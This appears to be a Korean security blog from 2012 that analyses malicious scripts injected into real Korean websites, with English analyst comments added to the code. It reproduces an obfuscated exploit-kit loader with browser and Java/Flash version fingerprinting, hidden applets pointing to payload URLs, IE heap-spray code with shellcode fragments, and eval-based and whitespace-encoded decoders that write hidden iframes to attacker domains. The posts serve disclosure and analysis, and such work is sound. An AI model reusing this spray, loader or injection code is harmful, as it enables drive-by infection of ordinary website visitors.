EGAZi3lK+u6YzEXBU9ORYn8kOK1S5uWZfGf7OHXmE6iNUVMYnSl/EVsNR1zVSgNqVcxzFDsMk

Aq6BY61q8tYX2sCfmc+hOOZ+TWM6rOBHvQ5KQBT+JKChWM0ehMxTK2kMNzCNFimMMuXRcw

euE+8Qib7AVU5S3dadoHXmTgMCGQNQxeLHqHY6/yUSShom1BNfHtDbOU3kvtsmejRQsqnRTjfv2

9L3lcWgbf1BupXZ3AUu0rn7Sil5NOavlnkP1acXwnhJZmpLPcPyc59p92nRB14cmtzyuQmy1tx0kZpM

gpQz3uf4IEBq2mouQl7LdEIlTJIngCkkxKkw2zoDx5ri0UxhHj6KqOSHO+lP59zry40nfG3WnO+cpJGGj

xczB4DNgvSG9NCKO9EnYY4fT8Fhc9rfY6DM26vldSdPJY5eOnVNTjIRrijSlbDSgLS9OBTt5A==",MxAAS="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",UAXzqa1="%77"+"%72"+"%69"+"%74"+"%65",Kxllz1z;
// (tail of the var statement that starts at var Yszz1 above: MxAAS unescapes to
// "document", UAXzqa1 to "write", Kxllz1z later receives the XXTEA key)
// UTF-8 -> string decoder: bytes with high nibble 0-7 are copied, 0xC0-0xDF start a
// 2-byte sequence, 0xE0-0xEF a 3-byte one; any other lead byte is dropped.
function Yszz_v1(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var kaixindecodeChars=new Array(-1,-1,-1,-1,-1,-1,[중략],1,-1);

// MxAAS was declared above as "%64%6f%63%75%6d%65%6e%74"; unescape'd it is "document".
MxAAS=AVgHbu2f(MxAAS);

function kaixindecode(str)
{
    // Base64 decoder driven by the kaixindecodeChars lookup table (declared above,
    // -1 for bytes outside the alphabet). Four table values yield three output
    // characters; non-alphabet b
    // ytes are skipped, a '=' (code 61) in the third or
    // fourth position ends decoding, and so does running out of input on a -1.
    // The original carries a /*Yszz 0.3*/ marker comment, the kit's version tag.
    var PAD = 61;
    var HIT_PAD = {};
    var limit = str.length;
    var pos = 0;
    var decoded = "";

    // Next alphabet value; -1 when the input ran out on a non-alphabet byte,
    // HIT_PAD when stopOnPad is set and the raw byte was '='.
    function nextValue(stopOnPad) {
        var value;
        do {
            value = str.charCodeAt(pos++) & 0xff;
            if (stopOnPad && value == PAD) {
                return HIT_PAD;
            }
            value = kaixindecodeChars[value];
        } while (pos < limit && value == -1);
        return value;
    }

    while (pos < limit) {
        var q1 = nextValue(false);
        if (q1 == -1) { break; }
        var q2 = nextValue(false);
        if (q2 == -1) { break; }
        decoded += String.fromCharCode((q1 << 2) | ((q2 & 0x30) >> 4));
        var q3 = nextValue(true);
        if (q3 === HIT_PAD) { return decoded; }
        if (q3 == -1) { break; }
        decoded += String.fromCharCode(((q2 & 0xF) << 4) | ((q3 & 0x3C) >> 2));
        var q4 = nextValue(true);
        if (q4 === HIT_PAD) { return decoded; }
        if (q4 == -1) { break; }
        decoded += String.fromCharCode(((q3 & 0x03) << 6) | q4);
    }
    return decoded;
}

function long2str(v, w) {
    // Unpacks an array of 32-bit little-endian words back into a string, four
    // characters per word, rewriting v in place. When w is set the last word is
    // read (before the rewrite) as the original length and the result is cut to it.
    var count = v.length;
    var declaredLen = v[count - 1] & 0xffffffff;
    for (var idx = 0; idx < count; idx++) {
        var word = v[idx];
        v[idx] = String.fromCharCode(word & 0xff, (word >>> 8) & 0xff, (word >>> 16) & 0xff, (word >>> 24) & 0xff);
    }
    var joined = v.join('');
    return w ? joined.substring(0, declaredLen) : joined;
}

function str2long(s, w) {
    // Packs a string into 32-bit little-endian words, four characters per word
    // (missing trailing characters read as NaN and contribute no bits). When w is
    // set the original length is appended as one extra word.
    var words = [];
    for (var offset = 0; offset < s.length; offset += 4) {
        words.push(s.charCodeAt(offset)
            | (s.charCodeAt(offset + 1) << 8)
            | (s.charCodeAt(offset + 2) << 16)
            | (s.charCodeAt(offset + 3) << 24));
    }
    if (w) {
        words.push(s.length);
    }
    return words;
}

// The XXTEA key: pkucde (declared above as Yszz1+Yszz2+Yszz3) unescapes to "Yszz00xxooxx00".
Kxllz1z=AVgHbu2f(pkucde);

// XXTEA (Corrected Block TEA) decryption of str with key Udkz: both are packed
// into 32-bit words by str2long and the plaintext is unpacked by long2str(v,true),
// which treats the final word as the byte length. delta 0x9E3779B9 and the mx
// mixing expression are the XXTEA constants and q = 6 + 52/(n+1) its round count.
// Precedence notes for the unparenthesised form: `a-b&m` is (a-b)&m,
// `sum>>>2&3` is (sum>>>2)&3, `k[p&3^e]` is k[(p&3)^e], and after the for loop
// p is 0, so the closing line uses k[e]. Empty input returns "" untouched.
function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

// UAXzqa1 was declared as "%77%72%69%74%65" -> "write"; MxAAS is already "document".
UAXzqa1=AVgHbu2f(UAXzqa1);

// Dz is never declared with var, so this creates a global. cu1l2lp3s2z is the long
// base64 blob declared above.
Dz=cu1l2lp3s2z;

// base64-decode -> XXTEA-decrypt with the unescape'd key -> UTF-8-decode, then
// window["document"]["write"](...) writes the result (the stage shown below) into the page.
Dz=Yszz_v1(kaixin(kaixindecode(Dz), Kxllz1z));window[MxAAS][UAXzqa1] (Dz);


// Exploit-selection stage (decrypted from the Yszz blob above). The lowercased UA
// is read again below under two more names (pcss, UaYcKzD2).
var RWkTTC8=navigator.userAgent.toLowerCase();

// One-shot gate: skipped when the Udz1szV cookie is already set or the UA
// contains "bot", "spider" or "linux".
if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1 && RWkTTC8.indexOf("linux")==-1)

{

// Flash version via SWFObject (swfobject.js in the chain above); this copy is
// never read, the else branch calls getPlayerVersion() again.
var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();

// Mark the visitor for 24 hours so the stage fires once per day.
var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();

// A second <body> element is appended; the applet below is still added to document.body.
var kaixiny=document.createElement('body');

document.body.appendChild(kaixiny);

// JRE version from deployJava.getJREs(), stringified (a comma-separated list would
// be cut to its first entry by parseInt), then "." and "_" removed and parsed, so
// "1.6.0_27" becomes 16027 -- the scale of the constants below.
var kaixinm=deployJava.getJREs()+"";

kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));

// Java path: any JRE up to 1.7.0_02 gets a 1x1 applet.
if (kaixinm<=17002)

{

var kaixin=document.createElement('applet');

kaixin.width="1";

kaixin.height="1";

// 1.6.0_00-1.6.0_27 or 1.5.0_00-1.5.0_31: first archive (served as .jpg), payload URL in "data".
if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031)) 

{

kaixin.archive="WHXgJTUj.jpg";

kaixin.code="GondadGondadExp.class";

kaixin.setAttribute("data","http://oppo.ltevc.com/csx/8191i.css");

document.body.appendChild(kaixin);

}

// Effectively 1.7.0_00-1.7.0_02 and 1.6.0_28-1.6.0_30: the 1.6.0_00-27 part was taken
// above and 15033<=x<=15000 can never hold. Second archive; payload URL and other
// parameters go through custom attributes. Note the path is /css/ here against /csx/ above.
else if ((kaixinm<=17002 && kaixinm>=17000) || (kaixinm<=16030 && kaixinm>=16000) ||(kaixinm>=15033 && kaixinm<=15000)) 

{

kaixin.archive="pvAjohpE.jpg";

kaixin.code="GondadExp.Ohno.class";

kaixin.setAttribute("xiaomaolv","http://oppo.ltevc.com/css/8191i.css");

kaixin.setAttribute("bn","woyouyizhixiaomaolv");

kaixin.setAttribute("si","conglaiyebuqi");

kaixin.setAttribute("bs","748");

document.body.appendChild(kaixin);

}

}

// No JRE in range (or none parsed): fall back to the Flash / IE pages.
else {


       var pcss=navigator.userAgent.toLowerCase();

       var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

       // deconcept.SWFObjectUtil.getPlayerVersion() with the names split up.
       var kxkx=deconcept["SWFOb"+"jectU"+"til"]["getPlay"+"erVer"+"sion"]();

       // Reads as (major 10, minor<=3, rev<=183) OR (major 11, minor<=1, rev<=102 on
       // IE6, IE7 or a non-IE browser) -> nBQVd.html (the SWF page shown further down).
       if(((kxkx['major']==10&&kxkx['minor']<=3)&&kxkx['rev']<=183||(kxkx['major']==11&&kxkx['minor']<=1&&kxkx['rev']<=102&&((pcss.indexOf('msie 6.0')>0)||(pcss.indexOf('msie 7.0')>0)||(pcss.indexOf('msie')==-1)))))

{

document.writeln("<iframe src=nBQVd.html><\/iframe>");

}

// Otherwise IE6/IE7 -> utEWY.html (the heapLib page shown further down).
else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

        {



      document.writeln("<iframe src=utEWY.html><\/iframe>");

        }

        else

        {

         // Dead code: this repeats the IE6/IE7 test the previous branch just
         // failed, so N9TtW.html is never written.
         if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

         {

               document.writeln("<iframe src=N9TtW.html><\/iframe>");

         }

}

}

}


<iframe src=utEWY.html>


<script>

function heapLib() {
    // Namespace holder only; never instantiated. The IE-specific implementation
    // is attached as heapLib.ie below.
}

heapLib.ie = function(maxAlloc, heapBase) {
    // Allocator state. Both arguments fall back on truthiness, so 0 is replaced
    // by the default exactly like undefined.
    this.maxAlloc = maxAlloc || 65535;
    this.heapBase = heapBase || 0x150000;

    // Grow the padding string by doubling until a UTF-16 copy of it, plus the
    // 4 + 2 bytes the size test adds, reaches maxAlloc.
    this.paddingStr = "AAAA";
    var bytesNeeded = function (s) {
        return 4 + s.length * 2 + 2;
    };
    while (bytesNeeded(this.paddingStr) < this.maxAlloc) {
        this.paddingStr = this.paddingStr + this.paddingStr;
    }

    this.mem = [];

    // Defined on the prototype outside this listing.
    this.flushOleaut32();
}



heapLib.ie.prototype.debug = function(msg) {
    // Debug hook: its only effect is a Math.atan2 call with the 0xbabe marker as
    // the first argument, presumably so a debugger breakpoint on atan2 can pick
    // up msg. atan2 coerces msg to a number, so an object argument has its
    // valueOf/toString invoked.
    var marker = 0xbabe;
    Math.atan2(marker, msg);
}


heapLib.ie.prototype.debugHeap = function(enable) {
    // Debug hook pair: atan for "on", asin for "off", each called with the 0xbabe
    // marker and nothing else; presumably distinguished by debugger breakpoints.
    // The loose == keeps the original's coercion (1 == true, "1" == true).
    var probe = (enable == true) ? "atan" : "asin";
    Math[probe](0xbabe);
}


heapLib.ie.prototype.debugBreak = function(msg) {
    // Debug hook: Math.acos with the 0xbabe marker; msg is accepted but never used.
    Math.acos(0xbabe);
}



heapLib.ie.prototype.padding = function(len) {
    // Returns the first len characters of the padding string prepared in the
    // constructor. Throws (a plain string, as the original does) when more is
    // requested than was prepared.
    var available = this.paddingStr.length;
    if (len > available) {
        throw "Requested padding string length " + len + ", only " + available + " available";
    }
    return this.paddingStr.substring(0, len);
}



heapLib.ie.prototype.round = function(num, round) {
    // Rounds num up to the next multiple of round for the non-negative sizes it
    // is used with, keeping the original's parseInt truncation of the quotient
    // (radix 10 is explicit but changes nothing for a number argument). Throws a
    // plain string when round is 0.
    if (round == 0) {
        throw "Round argument cannot be 0";
    }
    var quotient = (num + (round - 1)) / round;
    return parseInt(quotient, 10) * round;
}



heapLib.ie.prototype.hex = function(num, width)

{

    var digits = "0123456789ABCDEF";


    var hex = digits.substr(num & 0xF, 1);


    while (num > 0xF) {

        num = num >>> 4;

        hex = digits.substr(num & 0xF, 1) + hex;

    }


    var width = (width ? width : 0);


    while (hex.le...%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA

%u1441%u108A%uFA7A%u2[중략]%uBDBD%uBDBD"+"%uEAEA%uEAEA

%uEAEA%uEAEA");

// Heap spray (utEWY.html). `code` is the unescape'd %u string whose beginning is
// cut off above; presumably heap_obj is a heapLib.ie instance created in the same
// missing part. The 0x0c0c filler repeated to 0x80000 units is the classic IE spray
// pattern and a reliable detection signature on its own.
var nops = unescape("%u0c0c%u0c0c");

while (nops.length < 0x80000) nops += nops;

// Leading filler sized so filler+code is 0x800 units; the trailing substring length
// works out to 0 whenever code is shorter than 0x800, so each chunk is exactly
// filler followed by code.
var offset = nops.substring(0, 0x800 - code.length);

var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

// Chunk doubled to at least 0x40000 units, then cut to (0x80000-6)/2 units.
while (shellcode.length < 0x40000) shellcode += shellcode;

var block = shellcode.substring(0, (0x80000-6)/2);

// 0xa6f copies of the block are allocated through heap_obj (i starts at 1).
heap_obj.gc();

for (var i=1; i < 0xa70; i++)

{

heap_obj.alloc(block);

}


<iframe src=nBQVd.html>


var rcho6 =cWiDmn8+'oxzz5858oxzz5858oxzz10EBoxzz4B5BoxzzC933oxzzB966oxzz03B8

oxzz3480oxzzBD0BoxzzFAE2oxzz05EBoxzzEBE8oxzzFFFFoxzz54FFoxzzBEA3oxzzBDBD

oxzzD9E2oxzz8D1Cox[중략]oxzzEAEA';

// Second stage (nBQVd.html). NyzohAW2 and Vbfgj1 are assigned and never otherwise
// used in the visible code.
var NyzohAW2="d";

         // rcho6 (cut off above) is a long string with "oxzz" standing in for a
         // marker that csbcST4 restores before VHbfXE5 (both defined outside this
         // listing) turns it into the payload string.
         var APgm7 = VHbfXE5(rcho6.replace(/oxzz/g,csbcST4));        

         var kAtq4 = new Array()

         // Block size: 1 MiB minus the payload's UTF-16 byte size, 0x24 and 0x1000.
         var SPur3 = 0x100000 - (APgm7.length*2 + 0x24 + 0x1000);

         // Filler built the same way ("vglQ6" replaced, then decoded).
         var rbSO2 = "vglQ60d0"+"dvglQ60d0"+"d";

         var mWXJ4 = VHbfXE5(rbSO2.replace(/vglQ6/g,csbcST4));

         // a, b and c are not declared anywhere in the visible code, so this alert
         // throws a ReferenceError and the catch block always runs: the spray is
         // hidden inside an exception handler.
         try{alert(a,b,c);}

         catch(e)

   {

var Vbfgj1="d";

// Double the filler until it covers the block size, keep half of it (SPur3 bytes
// of UTF-16), then store 300 copies of filler+payload. `delete` on a var-declared
// binding is a no-op; `i` is an implicit global.
while(mWXJ4.length < SPur3) mWXJ4 +=mWXJ4;

         var iRre8 = mWXJ4.substring(0, SPur3/2);

         delete mWXJ4;

         for(i=0;i<300;i++) 

         {

              kAtq4[i] = [iRre8+APgm7].join("");    

         } 

    }

         

// Writes a zero-height Flash <embed> pointing at KR3ZE.swf into the page.
// Nothing in the visible excerpt calls this function; the onclick handler
// triggered two lines below may do so, but that handler is not in view.
// The referenced .swf file name is a useful indicator for log review.
function LFydVC8()

{


document.write("<embed src='KR3ZE.swf' width=10 height=0></embed>");

}

// Flip the marker set at the top of the script, then invoke the click
// handler of element "WFGGY8" directly.  The element and its handler are
// not in this excerpt; presumably the handler starts the payload chain.
NyzohAW2="h";

document.getElementById("WFGGY8").onclick();





posted by Kwan's 2012. 6. 29. 20:23

* 감염 페이지 : http://inews24.com/js_lib/slide_new.js

* 위 사이트 접속시 악성코드에 감염 될 수 있음을 알려드립니다!


원본 링크 !


<script type="text/javascript">
/* Analyst note: whitespace steganography decoder.  The argument is a run
   of space/tab characters terminated by '\n'.  Each output character is
   read from 7 input characters, most significant bit first: a space
   contributes a 1 bit, any other character (a tab in the captured
   sample) contributes 0, and the accumulated value is emitted with
   String.fromCharCode().  The "[생략]" in the call below is the blog
   author's elision of the real space/tab payload; its hex dump further
   down the post starts with 22 (the opening quote) and ends 5C 6E 22
   ("\n" followed by the closing quote). */
function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6; i>=0 ; i-- ){if (s.charAt(curr) == ' '){tmp = tmp | (Math.pow(2,i));}curr++;}r.push(String.fromCharCode(tmp));}return r.join('');}
/* The decoded text is handed to Function(...)() -- i.e. executed as
   script -- unless BOTH marker cookies are already present.  Each run
   then sets whichever marker is missing (OOOIUUTA first, RRXWEXEXPFF2
   on the next visit) with a 24-hour expiry, so a visitor runs the
   payload at most twice per day.  The two cookie names are reliable
   indicators when reviewing proxy or browser logs for this injection. */
if(document.cookie.indexOf("OOOIUUTA")==-1 || document.cookie.indexOf("RRXWEXEXPFF2")==-1)Function(RDfADFLDEXDFu5("    [생략]    \n"))();var cookiename = document.cookie.indexOf("OOOIUUTA") == -1 ? "OOOIUUTA" : "RRXWEXEXPFF2";var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=cookiename+"=Yes;path=/;expires="+expires.toGMTString();</script>


이처럼 공백이 생겨 있습니다 !


HEX 값


222020090920090920200920202020202009090920202020200920092020200920200920202009

0920092020200920202009202020092009090920092020200920202009202020202020090920092

0200920090920202020092009092020090920092009200920090909202020092009202020092020

2009202009092009202020200909202020200909092020202009090909202020200909090920200

9092009200920092009090909200909092009092009092009200920200909202020090909092020

2020200909202020200909092020202020090920092020092009092020202009090909202020092

0090909200909200920092020090920090920200909090920202009092020202020090920092020

0909092020092009092009200920200909202020090909200909202009200909092020200920090

9202020092009092020200909090909200909200920092020090920202009090909092009200909

2009200920200909200920090909202009092009092009200920200909200920090909202009202

0092020090920202020092009202020200909092020200920200920202020090909092009092009

2009202009092009200909092009202020090909202020200920202020202009202009200920090

9200920092020090920092009090920200920202009090909202009200909202020090909202009

2009092009200920200909200920090909202009202009200909202020092020092020200909202

0200920090920092009202009092009200909092009202020092009200920202009092020092009

0920092009202009092020200909092009200920090920092009202009092020200909090920200

9200909200920092020090920092009090920200920202009092020202009090920202020200909

2009202009200909202020200909090920202009200909092009092009200920200909202020090

909200920092009090920090920092009092009200920090920092020200920205C6E22


디코딩 !


여기서 위 함수의 tmp 값을 통해 다음과 같은 값이 나옵니다!


100,111,99,117,109,101,110,116,46,119,114

,[생략]

0,105,109,103,37,50,69,106,115,37,51,69,37,51,67,37,50,70,115,99,114,105,112,116,37,51,69,34,41,41,59


-----------------------------------------------------------------------------------------


document.write(unescape("%3Cscript%20src%3Dhttp

[생략]2Ecom%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));


-----------------------------------------------------------------------------------------

document.write(unescape("<script src=http://lzxvx.com/pxx/img.js></script>"));

이곳으로 연결됩니다!


디코딩 연결 링크 !


http://lzxvx.com/pix/img.js

http://lzxvx.com/pix/rot.html

http://lzxvx.com/pix/ll.html

~>http://lzxvx.com/pix/swfobject.js

~>http://lzxvx.com/pix/jpg.js


참고 페이지 : http://kjcc2.tistory.com/1338


posted by Kwan's 2012. 6. 29. 19:40
감염 사이트 : http://211.239.162.41/~dongposarang/killer.html  

* 악성 링크이니 조심하시기 바랍니다!

 

 <html><head><script type="text/javascript">window.location="";
 </script></head><body><!--c3284d--><script>s="";
 /* Analyst note (injection block "c3284d"): the outer try is built to
    fail -- appendChild() receives a string made from the undefined
    global n -- so control always reaches catch(qw); the inner try fails
    the same way (prototype is not a global) and lands in catch(zxc).
    The decoder therefore runs two exception levels deep, which defeats
    a straight-line read of the script.  The <!--c3284d--> / <!--/c3284d-->
    marker comments are a convenient grep signature when cleaning an
    infected document. */
 try
 {
   q=document.createElement("p");
   q.appendChild("123"+n);
 }
 catch(qw)
 {
   /* 016 is a legacy octal literal (14), so h === -2 and h*h === 4. */
   h=-016/7;
   try
   {
     a=prototype&5;
   }
   catch(zxc)
   {
     /* eval, assembled from fragments. */
     e=window["e"+"va"+"l"];
     /* n: dot-separated integers.  "[생략]" marks the blog author's cut;
        the stray spaces and line breaks inside the literal are page
        extraction artifacts -- the original is one quoted string. */
     n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략]

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

.split(".");
     /* Loop: i = 0 while i != 161.  Each character is n[i] divided by
        (i % 4) + 2, i.e. the divisor cycles 2,3,4,5.  The first entries
        decode to "\r\ndocument.w..."; the full result is the iframe
        document.write shown under [복호화] below. */
     if(window.document)for(i=6-2-1-2-1;
     -161+i!=2-2;
     i++)
     {
       k=i;
       s=s+String.fromCharCode(n[k]/(i%(h*h)+2));
     }
     /* Execute the decoded string. */
     e(s);
   }
  
 }
 </script><!--/c3284d-->
 <!--d93065--><!-- analyst note: the original line pads here with a long run of spaces so the second <script> sits far off the visible edge of an editor -->                                                                                                                                                                                                        <script>
 /* Analyst note (injection block "d93065"): same construction as the
    c3284d block above -- appendChild(q+"") is given a string, which
    throws, and `prototype` is undefined, so the decoder runs inside the
    innermost catch.  Differences: the codes are a numeric array instead
    of a dotted string, the method name is built as "fromCharC"+"ode",
    the divisor cycle is (i % 4) + 1, and the result is prefixed with
    "if(1)" before being eval'd.  The <!--d93065--> marker comments are a
    grep signature for cleanup. */
 try
 {
   q=document.createElement("p");
   q.appendChild(q+"");
 }
 catch(qw)
 {
   /* 012 is a legacy octal literal (10), so h === -2 and h*h === 4. */
   h=-012/5;
   try
   {
     bcsd=prototype-2;
   }
   catch(bawg)
   {
     /* ss starts as an empty array but becomes a string on the first
        concatenation below. */
     ss=[];
     f=(h)?("fromCharC"+"ode"):"";
     e=window["e"+"val"];
     /* "[생략]" marks the blog author's cut; the blank lines inside the
        array literal are page extraction artifacts. */
     n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

 102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];
     /* Loop: i = 0 while i != 160; character = n[i] / ((i % 4) + 1).
        The leading entries decode to "\r\ndocument.w..."; the full text
        is the second iframe document.write shown below. */
     if(window.document)for(i=6-2-1-2-1;
     -160+i!=2-2;
     i++)
     {
       k=i;
       ss=ss+String[f](n[k]/(i%(h*h)+2-1));
     }
     e("if(1)"+ss);
   }
  
 }
 </script><!--/d93065-->
 
 
 
 
 <a href="">Click</a>
 <!--start_qpi--><script src=http://mmm2011.ppcsoft.in/pizda.js></script><!--end_qpi-->
 </body></html>

 

[복호화]

 

26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략].

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

 

----------------------------------------------------------------------------------------

 

document.write('<iframe src="http://hecrery.ru/count11.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

========================================================================================

 

13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40

 

=======================================================================================

if(1)

document.write('<iframe src="http://iwahroq.ru/count6.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

count6.php, count11.php 페이지는 모두 죽어있는 상태이다 !

 

=========================
Server IP(s):
0.0.0.0

========================= 

 


posted by Kwan's 2012. 6. 3. 15:26

감염 사이트 : http://www.jeonju1318.or.kr 

* 위 사이트는 현재도 감염중에 있습니다! 


http://www.jeonju1318.or.kr/root/index.php 

안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다!


현재 감염된 페이지 내에 이렇게 Hex 코드로 위장한 iframe이 삽입되어 있습니다!


src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;(중략);&#x6C; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63; (중략) ; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F; (중략) ; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x

63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F; (중략) C; width=2 


간단하게 Hex 디코딩을 해 주면 제대로 된 iframe을 보실 수 있습니다!


http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html


현재 해당 페이지는 사라졌으며, http://www.test.ccc 로 Redirection 되고 있습니다!


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>302 Found</title>

</head><body>

<h1>Found</h1>

<p>The document has moved <a href="http://www.test.ccc">here</a>.</p>

</body></html>


http://www.test.ccc

=========================

Server IP(s):

0.0.0.0

=========================



posted by Kwan's 2012. 2. 26. 19:05
우연히 들어온 사이트중... 하나 스크립트중 신기한게 있어서 써본다.....
나도 어떻게 해결하는 방법인지는 아직 찾지 못하고 있다...... 어떻게 하는거지??
나도 잘 모르겠다....

원본 Script

0500520581041161161120580470470540490460500530490460490560550460490550540471071
14047102105108101115047109122046106112103

 

해독시 !

http://61.251.187.176/kr/files/mz.jpg 
~> 현재 접속 불가 !


참고한 블로그 :  http://jjoon.net/tc/343 
Decode 참고 사이트 : http://119.194.217.188:8080/Honeypot/


해결법이 있네요 : )
참조 하시면 쉽게 될꺼 같습니다 : )

http://kjcc2.tistory.com/1290  : 처리의 블로그 :: 악성파일 다운로드의 새로운 URL 암호화 방식

 
다른 방법을 아시는분은 댓글 주시면 정말 감사하겠습니다!


  1. 무한오류 2012.02.26 22:32

    8진수네요. Malzilla에서 풀 수 있습니다.
    1. 3글자씩 끊으면서 앞에 , 를 붙입니다.
    2. Malzilla 에서 [Misc Decoders]를 누릅니다.
    3. , 를 붙인 문자열을 빈공간에 넣어주고 아래에 Decode Dec(,) 버튼을 클릭해 주면 됩니다 :D

  2. 2012.04.19 23:54  Addr  Edit/Del  Reply

    비밀댓글입니다

    • Kwan's 2012.04.20 20:37

      ---------------------------
      Windows Internet Explorer
      ---------------------------
      <EMBED src=http://kdisk.da.to/tst.swf width=1 height=1 type=application/x-shockwave-flash wmode="transparent" bgcolor="#000000" allowFullScreen="true" allowScriptAccess="always"></EMBED>
      ---------------------------
      확인
      ---------------------------
